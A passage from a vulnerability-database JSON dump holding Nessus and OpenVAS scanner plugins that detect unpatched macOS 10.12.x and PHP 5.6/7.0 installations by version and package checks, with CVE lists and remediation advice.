CoreFoundation\n - CoreGraphics\n - CoreMedia External Displays\n - CoreMedia Playback\n - CoreStorage\n - CoreText\n - curl\n - Directory Services\n - Disk Images\n - FontParser\n - Foundation\n - Grapher\n - ICU\n - ImageIO\n - Intel Graphics Driver\n - IOFireWireFamily\n - IOAcceleratorFamily\n - IOHIDFamily\n - IOKit\n - IOSurface\n - Kernel\n - kext tools\n - libarchive\n - LibreSSL\n - OpenLDAP\n - OpenPAM\n - OpenSSL\n - Power Management\n - Security\n - syslog\n - WiFi\n - xar\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.\n\nFurthermore, CVE-2016-6304, CVE-2016-7596, and CVE-2016-7604 also affect Mac OS X versions 10.10.5 and 10.11.6. However, this plugin does not check those versions.", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "macOS 10.12.x < 10.12.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1777", "CVE-2016-1823", "CVE-2016-4688", "CVE-2016-4691", "CVE-2016-4693", "CVE-2016-5419", "CVE-2016-5420", "CVE-2016-5421", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-7141", "CVE-2016-7167", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7588", "CVE-2016-7591", "CVE-2016-7594", "CVE-2016-7595", "CVE-2016-7596", "CVE-2016-7600", "CVE-2016-7602", "CVE-2016-7603", "CVE-2016-7604", "CVE-2016-7605", "CVE-2016-7606", "CVE-2016-7607", "CVE-2016-7608", "CVE-2016-7609", "CVE-2016-7612", "CVE-2016-7615", "CVE-2016-7616", "CVE-2016-7617", "CVE-2016-7618", "CVE-2016-7619", "CVE-2016-7620", "CVE-2016-7621", "CVE-2016-7622", "CVE-2016-7624", "CVE-2016-7625", "CVE-2016-7627", "CVE-2016-7628", "CVE-2016-7629", "CVE-2016-7633", "CVE-2016-7636", "CVE-2016-7637", "CVE-2016-7643", "CVE-2016-7644", "CVE-2016-7655", "CVE-2016-7657", "CVE-2016-7658", "CVE-2016-7659", "CVE-2016-7660", "CVE-2016-7661", "CVE-2016-7662", "CVE-2016-7663", "CVE-2016-7714", "CVE-2016-7742", "CVE-2016-7761", "CVE-2016-8615", "CVE-2016-8616", "CVE-2016-8617", "CVE-2016-8618", "CVE-2016-8619", "CVE-2016-8620", "CVE-2016-8621", "CVE-2016-8622", "CVE-2016-8623", "CVE-2016-8624", "CVE-2016-8625"], "modified": "2020-01-07T00:00:00", "cpe": ["cpe:/o:apple:macos"], "id": "MACOS_10_12_2.NASL", "href": "https://www.tenable.com/plugins/nessus/95917", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95917);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2020/01/07\");\n\n script_cve_id(\n \"CVE-2016-1777\",\n \"CVE-2016-1823\",\n \"CVE-2016-4688\",\n \"CVE-2016-4691\",\n \"CVE-2016-4693\",\n \"CVE-2016-5419\",\n \"CVE-2016-5420\",\n \"CVE-2016-5421\",\n \"CVE-2016-6303\",\n \"CVE-2016-6304\",\n \"CVE-2016-7141\",\n \"CVE-2016-7167\",\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7413\",\n \"CVE-2016-7414\",\n \"CVE-2016-7416\",\n \"CVE-2016-7417\",\n \"CVE-2016-7418\",\n \"CVE-2016-7588\",\n \"CVE-2016-7591\",\n \"CVE-2016-7594\",\n \"CVE-2016-7595\",\n \"CVE-2016-7596\",\n \"CVE-2016-7600\",\n \"CVE-2016-7602\",\n \"CVE-2016-7603\",\n \"CVE-2016-7604\",\n \"CVE-2016-7605\",\n \"CVE-2016-7606\",\n \"CVE-2016-7607\",\n \"CVE-2016-7608\",\n \"CVE-2016-7609\",\n \"CVE-2016-7612\",\n \"CVE-2016-7615\",\n \"CVE-2016-7616\",\n \"CVE-2016-7617\",\n \"CVE-2016-7618\",\n \"CVE-2016-7619\",\n \"CVE-2016-7620\",\n \"CVE-2016-7621\",\n \"CVE-2016-7622\",\n \"CVE-2016-7624\",\n \"CVE-2016-7625\",\n \"CVE-2016-7627\",\n \"CVE-2016-7628\",\n \"CVE-2016-7629\",\n \"CVE-2016-7633\",\n \"CVE-2016-7636\",\n \"CVE-2016-7637\",\n \"CVE-2016-7643\",\n \"CVE-2016-7644\",\n \"CVE-2016-7655\",\n \"CVE-2016-7657\",\n \"CVE-2016-7658\",\n \"CVE-2016-7659\",\n \"CVE-2016-7660\",\n \"CVE-2016-7661\",\n \"CVE-2016-7662\",\n \"CVE-2016-7663\",\n \"CVE-2016-7714\",\n \"CVE-2016-7742\",\n \"CVE-2016-7761\",\n \"CVE-2016-8615\",\n \"CVE-2016-8616\",\n \"CVE-2016-8617\",\n \"CVE-2016-8618\",\n \"CVE-2016-8619\",\n \"CVE-2016-8620\",\n \"CVE-2016-8621\",\n \"CVE-2016-8622\",\n \"CVE-2016-8623\",\n \"CVE-2016-8624\",\n \"CVE-2016-8625\"\n );\n script_bugtraq_id(\n 85054,\n 90698,\n 92292,\n 92306,\n 92309,\n 92754,\n 92975,\n 92984,\n 93004,\n 93005,\n 93006,\n 93007,\n 93008,\n 93009,\n 93011,\n 93150,\n 94094,\n 94096,\n 94097,\n 94098,\n 94100,\n 94101,\n 94102,\n 94103,\n 94105,\n 94106,\n 94107,\n 94572,\n 94903,\n 94904,\n 94905,\n 94906\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-12-13-1\");\n\n script_name(english:\"macOS 10.12.x < 10.12.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS that is 10.12.x prior to\n10.12.2. It is, therefore, affected by multiple vulnerabilities in the\nfollowing components :\n\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - Assets\n - Audio\n - Bluetooth\n - CoreCapture\n - CoreFoundation\n - CoreGraphics\n - CoreMedia External Displays\n - CoreMedia Playback\n - CoreStorage\n - CoreText\n - curl\n - Directory Services\n - Disk Images\n - FontParser\n - Foundation\n - Grapher\n - ICU\n - ImageIO\n - Intel Graphics Driver\n - IOFireWireFamily\n - IOAcceleratorFamily\n - IOHIDFamily\n - IOKit\n - IOSurface\n - Kernel\n - kext tools\n - libarchive\n - LibreSSL\n - OpenLDAP\n - OpenPAM\n - OpenSSL\n - Power Management\n - Security\n - syslog\n - WiFi\n - xar\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\n\nFurthermore, CVE-2016-6304, CVE-2016-7596, and CVE-2016-7604 also\naffect Mac OS X versions 10.10.5 and 10.11.6. However, this plugin\ndoes not check those versions.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207423\");\n # http://lists.apple.com/archives/security-announce/2016/Dec/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?38dabd46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7644\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras_apple.inc\");\n\napp_info = vcf::apple::get_macos_info();\n\nvcf::apple::check_macos_restrictions(restrictions:['10.12']);\n\nconstraints = [{ \"fixed_version\" : \"10.12.2\" }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-05-29T18:35:48", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "cvss3": {}, "published": "2016-09-12T00:00:00", "type": "openvas", "title": "PHP Multiple Vulnerabilities - 03 - Sep16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310809316", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809316", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln03_sep16_win.nasl 14181 2019-03-14 12:59:41Z cfischer $\n#\n# PHP Multiple Vulnerabilities - 03 - Sep16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809316\");\n script_version(\"$Revision: 14181 $\");\n script_cve_id(\"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\",\n \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_bugtraq_id(93005, 93006, 93004, 93022, 93008, 93007, 93011);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:59:41 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-12 18:19:30 +0530 (Mon, 12 Sep 2016)\");\n script_name(\"PHP Multiple Vulnerabilities - 03 - Sep16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Use-after-free vulnerability in the 'wddx_stack_destroy' function\n in 'ext/wddx/wddx.c' script.\n\n - Improper varification of a BIT field has the UNSIGNED_FLAG flag\n in 'ext/mysqlnd/mysqlnd_wireprotocol.c' script.\n\n - The ZIP signature-verification feature does not ensure that the\n uncompressed_filesize field is large enough.\n\n - The script 'ext/spl/spl_array.c' proceeds with SplArray unserialization\n without validating a return value and data type.\n\n - The script 'ext/intl/msgformat/msgformat_format.c' does not properly restrict\n the locale length provided to the Locale class in the ICU library.\n\n - An error in the php_wddx_push_element function in ext/wddx/wddx.c.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to cause a denial of service, or possibly have unspecified\n other impact.\");\n\n script_tag(name:\"affected\", value:\"PHP versions prior to 5.6.26 and\n 7.x before 7.0.11 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.26, or 7.0.11,\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.6.26\"))\n{\n fix = \"5.6.26\";\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^7\\.0\")\n{\n if(version_in_range(version:phpVer, test_version:\"7.0\", test_version2:\"7.0.10\"))\n {\n fix = \"7.0.11\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:00", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "cvss3": {}, "published": "2016-09-12T00:00:00", "type": "openvas", "title": "PHP Multiple Vulnerabilities - 03 - Sep16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2018-10-17T00:00:00", "id": "OPENVAS:1361412562310809317", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809317", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln03_sep16_lin.nasl 11938 2018-10-17 10:08:39Z asteins $\n#\n# PHP Multiple Vulnerabilities - 03 - Sep16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809317\");\n script_version(\"$Revision: 11938 $\");\n script_cve_id(\"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\",\n \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_bugtraq_id(93005, 93006, 93004, 93022, 93008, 93007, 93011);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 12:08:39 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-12 18:19:30 +0530 (Mon, 12 Sep 2016)\");\n script_name(\"PHP Multiple Vulnerabilities - 03 - Sep16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Use-after-free vulnerability in the 'wddx_stack_destroy' function\n in 'ext/wddx/wddx.c' script.\n\n - Improper varification of a BIT field has the UNSIGNED_FLAG flag\n in 'ext/mysqlnd/mysqlnd_wireprotocol.c' script.\n\n - The ZIP signature-verification feature does not ensure that the\n uncompressed_filesize field is large enough.\n\n - The script 'ext/spl/spl_array.c' proceeds with SplArray unserialization\n without validating a return value and data type.\n\n - The script 'ext/intl/msgformat/msgformat_format.c' does not properly restrict\n the locale length provided to the Locale class in the ICU library.\n\n - An error in the php_wddx_push_element function in ext/wddx/wddx.c.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to cause a denial of service, or possibly have unspecified\n other impact.\");\n\n script_tag(name:\"affected\", value:\"PHP versions prior to 5.6.25 and\n 7.x before 7.0.10 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.25, or 7.0.10,\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.6.26\"))\n{\n fix = \"5.6.26\";\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^7\\.0\")\n{\n if(version_in_range(version:phpVer, test_version:\"7.0\", test_version2:\"7.0.10\"))\n {\n fix = \"7.0.11\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:57:29", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-754)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120743", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120743", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120743\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:27 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-754)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php70 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-754.html\");\n script_cve_id(\"CVE-2016-7418\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7412\", \"CVE-2016-7413\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php70-enchant\", rpm:\"php70-enchant~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-bcmath\", rpm:\"php70-bcmath~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-process\", rpm:\"php70-process~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-intl\", rpm:\"php70-intl~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-gmp\", rpm:\"php70-gmp~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-soap\", rpm:\"php70-soap~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-xml\", rpm:\"php70-xml~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-mbstring\", rpm:\"php70-mbstring~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-mcrypt\", rpm:\"php70-mcrypt~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-json\", rpm:\"php70-json~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-gd\", rpm:\"php70-gd~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-recode\", rpm:\"php70-recode~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-snmp\", rpm:\"php70-snmp~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-imap\", rpm:\"php70-imap~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-ldap\", rpm:\"php70-ldap~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-tidy\", rpm:\"php70-tidy~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-cli\", rpm:\"php70-cli~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-odbc\", rpm:\"php70-odbc~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-zip\", rpm:\"php70-zip~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-common\", rpm:\"php70-common~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-embedded\", rpm:\"php70-embedded~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-pdo-dblib\", rpm:\"php70-pdo-dblib~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-fpm\", rpm:\"php70-fpm~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-pdo\", rpm:\"php70-pdo~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-devel\", rpm:\"php70-devel~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-mysqlnd\", rpm:\"php70-mysqlnd~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-dba\", rpm:\"php70-dba~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-xmlrpc\", rpm:\"php70-xmlrpc~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-dbg\", rpm:\"php70-dbg~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-pgsql\", rpm:\"php70-pgsql~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-pspell\", rpm:\"php70-pspell~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-opcache\", rpm:\"php70-opcache~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70-debuginfo\", rpm:\"php70-debuginfo~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php70\", rpm:\"php70~7.0.11~1.16.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:34:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-10-15T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php5 (openSUSE-SU-2016:2540-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851410", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851410\");\n script_version(\"2020-01-31T08:23:39+0000\");\n 